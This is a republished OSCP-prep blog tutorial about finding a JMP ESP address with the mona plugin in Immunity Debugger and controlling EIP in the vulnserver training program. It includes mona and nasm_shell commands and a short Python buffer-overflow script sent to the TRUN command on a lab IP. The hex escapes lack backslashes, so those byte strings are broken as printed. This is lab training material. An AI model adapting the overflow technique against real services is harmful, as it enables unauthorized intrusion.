zoukankan      html  css  js  c++  java
  • OSCP Security Technology

    OSCP Security Technology - Finding the Right Module

    Download Mona module and set immunity debugger configuration.

    https://github.com/corelan/mona

    image-20210627190856268

    Open vulnserver and immunity debugger.

    image-20210627191116030

    Open mona modules, but not find what we need.

    image-20210627191421288

    Find the address(FFE4) and search it in the mona module.

    locate nasm_shell
    /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
    JMP ESP
    

    image-20210627191818299

    !mona find -s "xffxe4" -m essfunc.dll
    

    image-20210627192252854

    Write the exploit script.

    nano module.py
    chmod 777 module.py
    
    #!/usr/bin/python
    import socket
    import sys
     
    shellcode = "A" * 2003 + "xafx11x50x62"
    
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    
    try:
        connect=s.connect(('192.168.2.21',9999))
        s.send(('TRUN /.:/' + shellcode))
    except:
        print "check debugger" 
    s.close()
    

    Set immunity debugger before the exploit. Find the address and press F2 to highlight it.

    image-20210627193751978

    image-20210627193934587

    Run the exploit script.

    image-20210627194102224

    Break it at essfunc.625011AF.

    image-20210627194246225

    相信未来 - 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。
  • 相关阅读:
    HTML+CSS面试题汇总(持续更新)
    vue-router
    MongoDB
    闭包
    JavaScript的严格模式
    IO题目
    Java 题目集 编程
    Java题目集 函数
    2.面向对象基础-04继承
    2.面向对象基础-03Java数组
  • 原文地址:https://www.cnblogs.com/keepmoving1113/p/14941882.html
Copyright © 2011-2022 走看看